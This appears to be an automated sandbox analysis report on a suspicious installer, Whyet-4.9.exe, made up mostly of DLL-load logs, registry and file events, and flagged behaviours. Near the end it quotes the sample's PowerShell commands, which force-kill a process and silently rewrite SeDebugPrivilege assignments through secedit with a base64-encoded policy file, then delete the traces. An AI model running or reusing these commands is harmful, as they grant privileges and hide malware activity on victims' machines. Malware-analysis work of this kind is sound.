Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: wininet.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: taskschd.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: xmllite.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: napinsp.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: wshbth.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: nlaapi.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: winrnr.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: devenum.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: winmm.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: devobj.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msasn1.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msdmo.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: propsys.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: twext.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: slc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: userenv.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sppc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ntshrui.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: cscapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: twinapi.appcore.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: textshaping.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: starttiledata.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: acppage.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sfc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: msi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: aepic.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: edputil.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: netutils.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: mpr.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ndfapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wdi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: duser.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: atlthunk.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: taskschd.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\Whyet-4.9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File written: C:\inst.ini

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\letsvpn-latest.exe			Jump to behavior

Source: Whyet-4.9.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Whyet-4.9.exe

Static file information: File size 21152435 > 1048576

Source: Whyet-4.9.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: LxN_oT.exe, 00000011.00000003.2397585795.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmp, iusb3mon.exe, 00000020.00000003.2449036410.0000000000560000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: LxN_oT.exe, 00000011.00000003.2397585795.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmp, iusb3mon.exe, 00000020.00000003.2449036410.0000000000560000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=5800').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
